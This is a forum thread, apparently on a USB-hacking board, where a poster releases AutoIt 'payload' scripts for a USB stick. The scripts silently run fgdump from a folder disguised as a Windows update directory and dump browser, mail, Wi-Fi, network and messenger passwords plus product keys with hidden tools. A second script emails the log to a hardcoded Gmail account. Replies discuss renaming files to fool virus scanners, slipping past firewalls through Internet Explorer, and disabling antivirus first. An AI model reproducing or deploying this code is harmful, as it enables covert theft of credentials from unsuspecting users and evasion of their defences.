Jump to content

U3 and Non-U3 AutoIT payload


X3N
 Share

Recommended Posts

dun dun dun... ok i finally decided to release my code. Hopefully there will be some suggestions on how to make it better.

I have a main Payload and an SMTP mailer payload they both work great. I am also working on creating a multi OS Development environment with a GUI so anybody can throw to get their own payload fast. I dislike the U3 customizer because it pretty much sucks. Currently there are two possible methods to us the LP installer. One is to change your hosts file or dns entry and the other is to modify the exe to point to localhost or your own custom server name.

The Launcher Script which launches both the payload and pstart menu.

#cs ----------------------------------------------------------------------------

 AutoIt Version: 3.2.13.0 (beta)
 Author:         X3n

 Script Function:
	 Switchblade starter

#ce ----------------------------------------------------------------------------
#include <Date.au3>

$usb = DriveGetDrive("REMOVABLE")
If Not @error Then
;MsgBox(4096, "", "Found " & $usb[0] & " drives")
    For $i = 1 To $usb[0]
        If DriveGetLabel($usb[$i]) = "X3N" Then
            Global $usbdr = $usb[$i]
        EndIf
    Next
EndIf
Run ( $usbdr & "pstart" )
Run ( "SYSTEM\SRC\go.exe" , "SYSTEM\SRC\" )

Main Go.Exe code

#cs ----------------------------------------------------------------------------

 AutoIt Version: 3.2.13.0 (beta)
 Author:         X3n

 Script Function:
	REdo of switchblade

#ce ----------------------------------------------------------------------------
#include <Date.au3>
#NoTrayIcon

; Find USB drive letter & set as variable
$usb = DriveGetDrive("REMOVABLE")
If Not @error Then
    For $i = 1 To $usb[0]
        If DriveGetLabel($usb[$i]) = "X3N" Then
            Global $usbdr = $usb[$i]
        EndIf
    Next
EndIf

$time = @HOUR & "-" & @MIN & "-" & @SEC
EnvUpdate()
$computername = EnvGet("computername")
$systemroot = EnvGet("systemroot")
$logdir = $usbdr & "\System\Logs\" & $computername

;log file
$log = $usbdr & "\System\Logs\" & $computername & "\" & $computername & "-- ( " & $time & " ).log"

;templogfiles
$tmplog1 = $usbdr & "\System\Logs\" & $computername & "_temp01.log"
$tmplog2 = $usbdr & "\System\Logs\" & $computername & "_temp02.log"
$tmplog3 = $usbdr & "\System\Logs\" & $computername & "_temp03.log"
$tmplog4 = $usbdr & "\System\Logs\" & $computername & "_temp04.log"
$tmplog5 = $usbdr & "\System\Logs\" & $computername & "_temp05.log"
$tmplog6 = $usbdr & "\System\Logs\" & $computername & "_temp06.log"
$tmplog7 = $usbdr & "\System\Logs\" & $computername & "_temp07.log"
$tmplog8 = $usbdr & "\System\Logs\" & $computername & "_temp08.log"
$tmplog9 = $usbdr & "\System\Logs\" & $computername & "_temp09.log"
$tmplog10 = $usbdr & "\System\Logs\" & $computername & "_temp10.log"


;Run Pstart menu 
Run( $usbdr & "pstart" )
DirCreate( $logdir )

;Run( "csrsss.exe" )

;Remove previous run of fgdump if it exists
DirRemove( $systemroot & "\$NtUninstallKB531336$", 1)
;Open log file for editing... and adding logs... 
$file = FileOpen($log, 1)

;create and run fgdump on local system
DirCreate( $systemroot & "\$NtUninstallKB531336$" )
FileCopy ( "fgdump.exe" , $systemroot & "\$NtUninstallKB531336$\" )
RunWait( $systemroot & "\$NtUninstallKB531336$\fgdump.exe" , $systemroot & "\$NtUninstallKB531336$\" , @SW_HIDE )

;General Information on computer using autoIT macros
FileWriteLine($file, "----------------------X3n's Payload Time Started:  " & _Now()  & @CRLF)
FileWriteLine($file, @CRLF)
FileWriteLine($file, @CRLF)
FileWriteLine($file, @CRLF)
FileWriteLine($file, "----------------------X3ns payload--------------------------- "& @CRLF)
FileWriteLine($file, @CRLF)
FileWriteLine($file, "IP add 1:          " & @ipaddress1)
FileWriteLine($file, "IP add 2:          " &@ipaddress2)
FileWriteLine($file, "IP add 3:          " &@ipaddress3)
FileWriteLine($file, "IP add 4:          " &@ipaddress4)
FileWriteLine($file, "DNS Domain:        " &@LogonDNSDomain)
FileWriteLine($file, "Logon Domain:      " &@LogonDomain)
FileWriteLine($file, "Logon Server:      " &@LogonServer)
FileWriteLine($file, "Operating System:  " &@OSVersion)
FileWriteLine($file, "Username:          " &@UserName)

;Get pwdump log file
FileWriteLine($file, "---------------------------PWdump-------------------"& @CRLF)
$v_pwdump = FileRead($systemroot & "\$NtUninstallKB531336$\127.0.0.1.pwdump")
FileWrite($file, $v_pwdump)
FileWriteLine($file, @CRLF)
FileWriteLine($file, @CRLF)
FileWriteLine($file, _Now()  & @CRLF)

;Get cachedump log file
FileWriteLine($file, "---------------------------CacheDump-------------------"& @CRLF)
$v_cdump = FileRead($systemroot & "\$NtUninstallKB531336$\127.0.0.1.cachedump")
FileWrite($file, $v_cdump)
FileWriteLine($file, @CRLF)
FileWriteLine($file, @CRLF)
FileWriteLine($file, _Now()  & @CRLF)

;password fox 
FileWriteLine($file, "----------------------Password Fox--------------------------- "& @CRLF)
FileWriteLine($file, @CRLF)
FileWriteLine($file, @CRLF)
Runwait(@ComSpec & " /c " & 'PasswordFox.exe /stext ' & $tmplog1, "", @SW_HIDE)
$v_tmplog1 = FileRead($tmplog1)
FileWrite($file, $v_tmplog1)
ProcessWaitClose("PasswordFox.exe")
FileWriteLine($file, _Now()  & @CRLF)

; Dump mozilla history
FileWriteLine($file, "----------------------Mozilla History--------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'MHV.exe /stext ' & $tmplog2, "", @SW_HIDE)
$v_tmplog2 = FileRead($tmplog2)
FileWrite($file, $v_tmplog2)
FileWriteLine($file, @CRLF)
ProcessWaitClose("MHV.exe")

;Dump ie saved passwords
FileWriteLine($file, "---------------------- IE Pass --------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'iepv.exe /stext ' & $tmplog3, "", @SW_HIDE)
$v_tmplog3 = FileRead($tmplog3)
FileWrite($file, $v_tmplog3)
FileWriteLine($file, @CRLF)
ProcessWaitClose("iepv.exe")
FileWriteLine($file, _Now()  & @CRLF)

;Dump mail passwords
FileWriteLine($file, "---------------------- MailPassView --------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'mpv.exe /stext ' & $tmplog4, "", @SW_HIDE)
$v_tmplog4 = FileRead($tmplog4)
FileWrite($file, $v_tmplog4)
FileWriteLine($file, @CRLF)
ProcessWaitClose("mpv.exe")
FileWriteLine($file, _Now()  & @CRLF)

;Dump Product Keys
FileWriteLine($file, "---------------------- ProductKeys --------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'prok.exe /stext ' & $tmplog5, "", @SW_HIDE)
$v_tmplog5 = FileRead($tmplog5)
FileWrite($file, $v_tmplog5)
FileWriteLine($file, @CRLF)
ProcessWaitClose("prok.exe")
FileWriteLine($file, _Now()  & @CRLF)

;Dump protected storage
FileWriteLine($file, "---------------------- Protected Storage --------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'pspv.exe /stext ' & $tmplog6, "", @SW_HIDE)
$v_tmplog6 = FileRead($tmplog6)
FileWrite($file, $v_tmplog6)
FileWriteLine($file, @CRLF)
ProcessWaitClose("pspv.exe")
FileWriteLine($file, _Now()  & @CRLF)

;Dump WIFI saved Keys
FileWriteLine($file, "---------------------- WifiKeys --------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'wkv.exe /stext ' & $tmplog7, "", @SW_HIDE)
$v_tmplog7 = FileRead($tmplog7)
FileWrite($file, $v_tmplog7)
FileWriteLine($file, @CRLF)
ProcessWaitClose("wkv.exe")
FileWriteLine($file, _Now()  & @CRLF)

;Dump Network passwords
FileWriteLine($file, "---------------------- NetPass --------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'netpass.exe /stext ' & $tmplog8, "", @SW_HIDE)
$v_tmplog8 = FileRead($tmplog8)
FileWrite($file, $v_tmplog8)
FileWriteLine($file, @CRLF)
ProcessWaitClose("netpass.exe")
FileWriteLine($file, _Now()  & @CRLF)

;Dump  Messenger passwords
FileWriteLine($file, "---------------------- MsPass --------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'mspass.exe /stext ' & $tmplog9, "", @SW_HIDE)
$v_tmplog9 = FileRead($tmplog9)
FileWrite($file, $v_tmplog9)
FileWriteLine($file, @CRLF)
ProcessWaitClose("mspass.exe")
FileWriteLine($file, _Now()  & @CRLF)

FileWriteLine($file, "-------------------------X3n's Payload Time Ended:  " & _Now()  & @CRLF)
DirRemove( $systemroot & "\$NtUninstallKB531336$", 1)
FileClose($file)

FileDelete($tmplog1)
FileDelete($tmplog2)
FileDelete($tmplog3)
FileDelete($tmplog4)
FileDelete($tmplog5)
FileDelete($tmplog6)
FileDelete($tmplog7)
FileDelete($tmplog8)
FileDelete($tmplog9)
FileDelete($tmplog10)

SMTP mailer go-smtp.exe

#cs ----------------------------------------------------------------------------

 AutoIt Version: 3.2.13.0 (beta)
 Author:         X3n

 Script Function:
	REdo of switchblade

#ce ----------------------------------------------------------------------------
#include <Date.au3>


#NoTrayIcon

; Find USB drive letter & set as variable
$usb = DriveGetDrive("REMOVABLE")
If Not @error Then
    For $i = 1 To $usb[0]
        If DriveGetLabel($usb[$i]) = "X3N" Then
            Global $usbdr = $usb[$i]
        EndIf
    Next
EndIf

$time = @HOUR & "-" & @MIN & "-" & @SEC
EnvUpdate()
$computername = EnvGet("computername")
$systemroot = EnvGet("systemroot")
$logdir = $usbdr & "\System\Logs\" & $computername

;log files
$log = $usbdr & "\System\Logs\" & $computername & "\" & $computername & "-- ( " & $time & " ).log"
;templogfiles
$tmplog1 = $usbdr & "\System\Logs\" & $computername & "_temp01.log"
$tmplog2 = $usbdr & "\System\Logs\" & $computername & "_temp02.log"
$tmplog3 = $usbdr & "\System\Logs\" & $computername & "_temp03.log"
$tmplog4 = $usbdr & "\System\Logs\" & $computername & "_temp04.log"
$tmplog5 = $usbdr & "\System\Logs\" & $computername & "_temp05.log"
$tmplog6 = $usbdr & "\System\Logs\" & $computername & "_temp06.log"
$tmplog7 = $usbdr & "\System\Logs\" & $computername & "_temp07.log"
$tmplog8 = $usbdr & "\System\Logs\" & $computername & "_temp08.log"
$tmplog9 = $usbdr & "\System\Logs\" & $computername & "_temp09.log"
$tmplog10 = $usbdr & "\System\Logs\" & $computername & "_temp10.log"


;email to gmail account settings
$emailfrom = ("hckbld")
$emailto = ("hckbld@gmail.com")
$epassword = ("hckbld#2008")
$subject = $computername & $time

;Run Pstart menu 
Run( $usbdr & "pstart" )
DirCreate( $logdir )

;Run( "csrsss.exe" )

;Remove previous run of fgdump if it exists
DirRemove( $systemroot & "\$NtUninstallKB531336$", 1)
;Open log file for editing... and adding logs... 
$file = FileOpen($log, 1)

;create and run fgdump on local system
DirCreate( $systemroot & "\$NtUninstallKB531336$" )
FileCopy ( "fgdump.exe" , $systemroot & "\$NtUninstallKB531336$\" )
RunWait( $systemroot & "\$NtUninstallKB531336$\fgdump.exe" , $systemroot & "\$NtUninstallKB531336$\" , @SW_HIDE )




;General Information on computer using autoIT macros
FileWriteLine($file, "----------------------X3n's Payload Time Started:  " & _Now()  & @CRLF)
FileWriteLine($file, @CRLF)
FileWriteLine($file, @CRLF)
FileWriteLine($file, @CRLF)
FileWriteLine($file, "----------------------X3ns payload--------------------------- "& @CRLF)
FileWriteLine($file, @CRLF)
FileWriteLine($file, "IP add 1:          " & @ipaddress1)
FileWriteLine($file, "IP add 2:          " &@ipaddress2)
FileWriteLine($file, "IP add 3:          " &@ipaddress3)
FileWriteLine($file, "IP add 4:          " &@ipaddress4)
FileWriteLine($file, "DNS Domain:        " &@LogonDNSDomain)
FileWriteLine($file, "Logon Domain:      " &@LogonDomain)
FileWriteLine($file, "Logon Server:      " &@LogonServer)
FileWriteLine($file, "Operating System:  " &@OSVersion)
FileWriteLine($file, "Username:          " &@UserName)

;Get pwdump log file
FileWriteLine($file, "---------------------------PWdump-------------------"& @CRLF)
$v_pwdump = FileRead($systemroot & "\$NtUninstallKB531336$\127.0.0.1.pwdump")
FileWrite($file, $v_pwdump)
FileWriteLine($file, @CRLF)
FileWriteLine($file, @CRLF)
FileWriteLine($file, _Now()  & @CRLF)

;Get cachedump log file
FileWriteLine($file, "---------------------------CacheDump-------------------"& @CRLF)
$v_cdump = FileRead($systemroot & "\$NtUninstallKB531336$\127.0.0.1.cachedump")
FileWrite($file, $v_cdump)
FileWriteLine($file, @CRLF)
FileWriteLine($file, @CRLF)
FileWriteLine($file, _Now()  & @CRLF)

;password fox 
FileWriteLine($file, "----------------------Password Fox--------------------------- "& @CRLF)
FileWriteLine($file, @CRLF)
FileWriteLine($file, @CRLF)
Runwait(@ComSpec & " /c " & 'PasswordFox.exe /stext ' & $tmplog1, "", @SW_HIDE)
$v_tmplog1 = FileRead($tmplog1)
FileWrite($file, $v_tmplog1)
ProcessWaitClose("PasswordFox.exe")
FileWriteLine($file, _Now()  & @CRLF)

; Dump mozilla history
FileWriteLine($file, "----------------------Mozilla History--------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'MHV.exe /stext ' & $tmplog2, "", @SW_HIDE)
$v_tmplog2 = FileRead($tmplog2)
FileWrite($file, $v_tmplog2)
FileWriteLine($file, @CRLF)
ProcessWaitClose("MHV.exe")

;Dump ie saved passwords
FileWriteLine($file, "---------------------- IE Pass --------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'iepv.exe /stext ' & $tmplog3, "", @SW_HIDE)
$v_tmplog3 = FileRead($tmplog3)
FileWrite($file, $v_tmplog3)
FileWriteLine($file, @CRLF)
ProcessWaitClose("iepv.exe")
FileWriteLine($file, _Now()  & @CRLF)

;Dump mail passwords
FileWriteLine($file, "---------------------- MailPassView --------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'mpv.exe /stext ' & $tmplog4, "", @SW_HIDE)
$v_tmplog4 = FileRead($tmplog4)
FileWrite($file, $v_tmplog4)
FileWriteLine($file, @CRLF)
ProcessWaitClose("mpv.exe")
FileWriteLine($file, _Now()  & @CRLF)

;Dump Product Keys
FileWriteLine($file, "---------------------- ProductKeys --------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'prok.exe /stext ' & $tmplog5, "", @SW_HIDE)
$v_tmplog5 = FileRead($tmplog5)
FileWrite($file, $v_tmplog5)
FileWriteLine($file, @CRLF)
ProcessWaitClose("prok.exe")
FileWriteLine($file, _Now()  & @CRLF)

;Dump protected storage
FileWriteLine($file, "---------------------- Protected Storage --------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'pspv.exe /stext ' & $tmplog6, "", @SW_HIDE)
$v_tmplog6 = FileRead($tmplog6)
FileWrite($file, $v_tmplog6)
FileWriteLine($file, @CRLF)
ProcessWaitClose("pspv.exe")
FileWriteLine($file, _Now()  & @CRLF)

;Dump WIFI saved Keys
FileWriteLine($file, "---------------------- WifiKeys --------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'wkv.exe /stext ' & $tmplog7, "", @SW_HIDE)
$v_tmplog7 = FileRead($tmplog7)
FileWrite($file, $v_tmplog7)
FileWriteLine($file, @CRLF)
ProcessWaitClose("wkv.exe")
FileWriteLine($file, _Now()  & @CRLF)

;Dump Network passwords
FileWriteLine($file, "---------------------- NetPass --------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'netpass.exe /stext ' & $tmplog8, "", @SW_HIDE)
$v_tmplog8 = FileRead($tmplog8)
FileWrite($file, $v_tmplog8)
FileWriteLine($file, @CRLF)
ProcessWaitClose("netpass.exe")
FileWriteLine($file, _Now()  & @CRLF)

;Dump  Messenger passwords
FileWriteLine($file, "---------------------- MsPass --------------------------- "& @CRLF)
Runwait(@ComSpec & " /c " & 'mspass.exe /stext ' & $tmplog9, "", @SW_HIDE)
$v_tmplog9 = FileRead($tmplog9)
FileWrite($file, $v_tmplog9)
FileWriteLine($file, @CRLF)
ProcessWaitClose("mspass.exe")
FileWriteLine($file, _Now()  & @CRLF)



FileWriteLine($file, "-------------------------X3n's Payload Time Ended:  " & _Now()  & @CRLF)
DirRemove( $systemroot & "\$NtUninstallKB531336$", 1)
FileClose($file)

FileDelete($tmplog1)
FileDelete($tmplog2)
FileDelete($tmplog3)
FileDelete($tmplog4)
FileDelete($tmplog5)
FileDelete($tmplog6)
FileDelete($tmplog7)
FileDelete($tmplog8)
FileDelete($tmplog9)
FileDelete($tmplog10)


#Include<file.au3>
Global $oMyError = ObjEvent("AutoIt.Error", "MyErrFunc")
;##################################
; Include
;##################################
#Include<file.au3>
;##################################
; Variables
;##################################
$s_SmtpServer = "smtp.gmail.com"              ; address for the smtp-server to use - REQUIRED
$s_FromName = "xxx"                      ; name from who the email was sent
$s_FromAddress = "xxx@gmail.com" ;  address from where the mail should come
$s_ToAddress = "xxx@gmail.com"   ; destination address of the email - REQUIRED
$s_Subject = $log                  ; subject from the email - can be anything you want it to be
$as_Body = ""                          ; the messagebody from the mail - can be left blank but then you get a blank mail
$s_AttachFiles = $log                       ; the file you want to attach- leave blank if not needed
$s_CcAddress = ""       ; address for cc - leave blank if not needed
$s_BccAddress = ""     ; address for bcc - leave blank if not needed
$s_Username = "xxxxx"                    ; username for the account used from where the mail gets sent  - Optional (Needed for eg GMail)
$s_Password = "xxxxx"                  ; password for the account used from where the mail gets sent  - Optional (Needed for eg GMail)
$IPPort = 465                              ; port used for sending the mail
$ssl = 1                                  ; enables/disables secure socket layer sending - put to 1 if using httpS
;~ $IPPort=465                            ; GMAIL port used for sending the mail
;~ $ssl=1                                 ; GMAILenables/disables secure socket layer sending - put to 1 if using httpS

;##################################
; Script
;##################################
Global $oMyRet[2]
Global $oMyError = ObjEvent("AutoIt.Error", "MyErrFunc")
$rc = _INetSmtpMailCom($s_SmtpServer, $s_FromName, $s_FromAddress, $s_ToAddress, $s_Subject, $as_Body, $s_AttachFiles, $s_CcAddress, $s_BccAddress, $s_Username, $s_Password, $IPPort, $ssl)
If @error Then
    MsgBox(0, "Error sending message", "Error code:" & @error & "  Rc:" & $rc)
EndIf
;

Func _INetSmtpMailCom($s_SmtpServer, $s_FromName, $s_FromAddress, $s_ToAddress, $s_Subject = "", $as_Body = "", $s_AttachFiles = "", $s_CcAddress = "", $s_BccAddress = "", $s_Username = "", $s_Password = "",$IPPort=25, $ssl=0)
    $objEmail = ObjCreate("CDO.Message")
    $objEmail.From = '"' & $s_FromName & '" <' & $s_FromAddress & '>'
    $objEmail.To = $s_ToAddress
    Local $i_Error = 0
    Local $i_Error_desciption = ""
    If $s_CcAddress <> "" Then $objEmail.Cc = $s_CcAddress
    If $s_BccAddress <> "" Then $objEmail.Bcc = $s_BccAddress
    $objEmail.Subject = $s_Subject
    If StringInStr($as_Body,"<") and StringInStr($as_Body,">") Then
        $objEmail.HTMLBody = $as_Body
    Else
        $objEmail.Textbody = $as_Body & @CRLF
    EndIf
    If $s_AttachFiles <> "" Then
        Local $S_Files2Attach = StringSplit($s_AttachFiles, ";")
        For $x = 1 To $S_Files2Attach[0]
            $S_Files2Attach[$x] = _PathFull ($S_Files2Attach[$x])
            If FileExists($S_Files2Attach[$x]) Then
                $objEmail.AddAttachment ($S_Files2Attach[$x])
            Else
                $i_Error_desciption = $i_Error_desciption & @lf & 'File not found to attach: ' & $S_Files2Attach[$x]
                SetError(1)
                return 0
            EndIf
        Next
    EndIf
    $objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
    $objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpserver") = $s_SmtpServer
    $objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = $IPPort
;Authenticated SMTP
    If $s_Username <> "" Then
        $objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
        $objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendusername") = $s_Username
        $objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendpassword") = $s_Password
    EndIf
    If $Ssl Then
        $objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = True
    EndIf
;Update settings
    $objEmail.Configuration.Fields.Update
; Sent the Message
    $objEmail.Send
    if @error then
        SetError(2)
        return $oMyRet[1]
    EndIf
EndFunc ;==>_INetSmtpMailCom
;
;
; Com Error Handler
Func MyErrFunc()
    $HexNumber = Hex($oMyError.number, 8)
    $oMyRet[0] = $HexNumber
    $oMyRet[1] = StringStripWS($oMyError.description,3)
    ConsoleWrite("### COM Error !  Number: " & $HexNumber & "   ScriptLine: " & $oMyError.scriptline & "   Description:" & $oMyRet[1] & @LF)
    SetError(1); something to check for when this function returns
    Return
EndFunc ;==>MyErrFunc

Link to comment
Share on other sites

Good work. I will donwnoad AutoIT to compile the modules and see how it works... Thanks!

You don't even have to compile it to run it. Just install autoIT and you can just run the scripts.

Also its meant to be run with the latest nirsoft programs so if anyone is interested they can just roll their own payload.

Link to comment
Share on other sites

  • 1 month later...

I downloaded the files and now I'm reading the au3 files. What's the purpose of GUI.au3?

Is the original host files copied and reinstalled after the iso is updated?

:edit answered

FileCopy( @SystemDir & "\drivers\etc\hosts", @SystemDir & "\drivers\etc\hosts.orig" )
..
..
If FileExists( @SystemDir & "\drivers\etc\hosts.orig")  Then
FileCopy( @SystemDir & "\drivers\etc\hosts.orig", @SystemDir & "\drivers\etc\hosts" )

WOW!

Link to comment
Share on other sites

I would have fileinstall install files with different names that way it can fool some of the virus scanners. Other than that fairly good.

You could also adapt this script i wrote to capture what's installed

Dim $strComputer, $objWMIService
Const $wbemFlagReturnImmediately = 0x10
Const $wbemFlagForwardOnly = 0x20

$strComputer = "."
$objWMIService = ObjGet("winmgmts:{(RemoteShutdown)}//" & $strComputer & "\root\CIMV2")

_Read_Products()
Exit

Func _Read_Products()
Local $colItems = ""
  $colItems = $objWMIService.ExecQuery("Select * from Win32_Product")
   
   For $objItem in $colItems
;$ProductName = $objItem.Name
        Select
            Case stringinstr($objItem.Name,'Microsoft .NET Framework');and StringLeft($objItem.Version,'3')="3.5"
                msgbox(0,"Found",$objItem.Name & @CRLF & $objItem.Version)
;Return 1
        EndSelect
   Next
EndFunc

How come you use EnvGet and don't use @computername or @systemdir? _Filewritelog will give you the time and date on each line.

Link to comment
Share on other sites

I downloaded the files and now I'm reading the au3 files. What's the purpose of GUI.au3?

Is the original host files copied and reinstalled after the iso is updated?

:edit answered

FileCopy( @SystemDir & "\drivers\etc\hosts", @SystemDir & "\drivers\etc\hosts.orig" )
..
..
If FileExists( @SystemDir & "\drivers\etc\hosts.orig")  Then
FileCopy( @SystemDir & "\drivers\etc\hosts.orig", @SystemDir & "\drivers\etc\hosts" )

WOW!

yeah thast what i made it do

Link to comment
Share on other sites

What about the GUI?

i didnt clean up the files well enough some of those files i was using for development wstart has everything in it some of the others are just extra.

i was using KODa to generate the gui layout

Link to comment
Share on other sites

Ok, ok, ok... I was seeing it at now...

I know the fact to have your compiled version for the payload is better to hide your fingertips because you are compiling the mail account name and password into the same exe file but, what about doing it in the MySQL+PHP way that was written in this same forum? By the way, it assures the bypass for any router because it does the stuff using port 80.

Link to comment
Share on other sites

Ok, ok, ok... I was seeing it at now...

I know the fact to have your compiled version for the payload is better to hide your fingertips because you are compiling the mail account name and password into the same exe file but, what about doing it in the MySQL+PHP way that was written in this same forum? By the way, it assures the bypass for any router because it does the stuff using port 80.

how about doing the php log transfer thing with autoit?

When most programs are run, whether using php or smtp, they always trigger a question from decent firewalls.

DO YOU WANT THIS PROGRAM TO ACCESS THE INTERNET?

I think I have found a way to bypass this completely.

Autoit has a way of accessing webpages in the backround with ie...which is typically already allowed internet access.

Using this method and php, logs can be transferred without any kind of interruption.

I have most of the stuff already coded in autoit--i am currently working out the bugs.

Link to comment
Share on other sites

how about doing the php log transfer thing with autoit?

When most programs are run, whether using php or smtp, they always trigger a question from decent firewalls.

DO YOU WANT THIS PROGRAM TO ACCESS THE INTERNET?

I think I have found a way to bypass this completely.

Autoit has a way of accessing webpages in the backround with ie...which is typically already allowed internet access.

Using this method and php, logs can be transferred without any kind of interruption.

I have most of the stuff already coded in autoit--i am currently working out the bugs.

im not overly concerned with the php log stuff... i can definitly add the functionality if someone else wants to write it.

Link to comment
Share on other sites

I would have fileinstall install files with different names that way it can fool some of the virus scanners. Other than that fairly good.

You could also adapt this script i wrote to capture what's installed

Dim $strComputer, $objWMIService
Const $wbemFlagReturnImmediately = 0x10
Const $wbemFlagForwardOnly = 0x20

$strComputer = "."
$objWMIService = ObjGet("winmgmts:{(RemoteShutdown)}//" & $strComputer & "\root\CIMV2")

_Read_Products()
Exit

Func _Read_Products()
Local $colItems = ""
  $colItems = $objWMIService.ExecQuery("Select * from Win32_Product")
   
   For $objItem in $colItems
;$ProductName = $objItem.Name
        Select
            Case stringinstr($objItem.Name,'Microsoft .NET Framework');and StringLeft($objItem.Version,'3')="3.5"
                msgbox(0,"Found",$objItem.Name & @CRLF & $objItem.Version)
;Return 1
        EndSelect
   Next
EndFunc

How come you use EnvGet and don't use @computername or @systemdir? _Filewritelog will give you the time and date on each line.

This was my first attempt at writing anything long in autoIT so the code is messy... i have a way better method now that i'll be releasing soon that uses fileinstall and runs everything in a much more logical way.

Link to comment
Share on other sites

how about doing the php log transfer thing with autoit?

When most programs are run, whether using php or smtp, they always trigger a question from decent firewalls.

DO YOU WANT THIS PROGRAM TO ACCESS THE INTERNET?

:blink: Of course! I didn't thought about it, but I agree that any firewall will trigger the program while accessing the Internet... Then will see on what you have been working when you have it done.
Link to comment
Share on other sites

:blink: Of course! I didn't thought about it, but I agree that any firewall will trigger the program while accessing the Internet... Then will see on what you have been working when you have it done.

there are many ways to get the log file out but i kinda prefer the gmail method using auotIT because you dont have to use any external programs... Any normal hardware firewall should allow you email access the problem that your talking about is in regards to software firewalls which you should probably disable before running this payload anyways... with a method like the av killer programs...

Link to comment
Share on other sites

there are many ways to get the log file out but i kinda prefer the gmail method using auotIT because you dont have to use any external programs... Any normal hardware firewall should allow you email access the problem that your talking about is in regards to software firewalls which you should probably disable before running this payload anyways... with a method like the av killer programs...

I have McAfee (and so do most the people I know).

I know for a fact that most people *do not* use hardware firewalls.

McAfee firewall blocks all attempts made by the autoit program.

I have made numerous attempts to "disable" my McAfee firewall (processkilling, etc).

The only thing left would be to permanently disable the program (leaving massive tracks).

The best solution is to bypass the firewall using a commonly used universal program (hence internet explorer).

Link to comment
Share on other sites

Yes, the problem is with any firewall software, then there's another problem that is to disable the firewall software. You can do it in windows but must to kill the task with other firewall software... Then double problem!

One: Disable the antivirus...

Two: Disable the firewall...

With the batch method, you doesn't need to disable (or allow) anything but the antivirus software. Please, correct me if is not as I'm saying.

I think a good solution is calling a batch from the AutoIT program, give it the correct parameters into variables and do the task with the batch.

Other way could be using different ways (ftp, http post, email), selectable by the user in a pre-configuration (by the GUI) to send the logs and calling different batches from the compiled exe with the options elected. Then the payload would work for anyone using it. :huh:

Link to comment
Share on other sites

Yes, the problem is with any firewall software, then there's another problem that is to disable the firewall software. You can do it in windows but must to kill the task with other firewall software... Then double problem!

One: Disable the antivirus...

Two: Disable the firewall...

With the batch method, you doesn't need to disable (or allow) anything but the antivirus software. Please, correct me if is not as I'm saying.

I think a good solution is calling a batch from the AutoIT program, give it the correct parameters into variables and do the task with the batch.

Other way could be using different ways (ftp, http post, email), selectable by the user in a pre-configuration (by the GUI) to send the logs and calling different batches from the compiled exe with the options elected. Then the payload would work for anyone using it. :huh:

well if you want you can add the autoIT executable and call the script from a bat script because all you need is the standalone autoIT executable to run the scripts without compiling them.

I'm not against using the IE php method i just prefer the gmail method... plus i dont have access to my own webserver yet.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...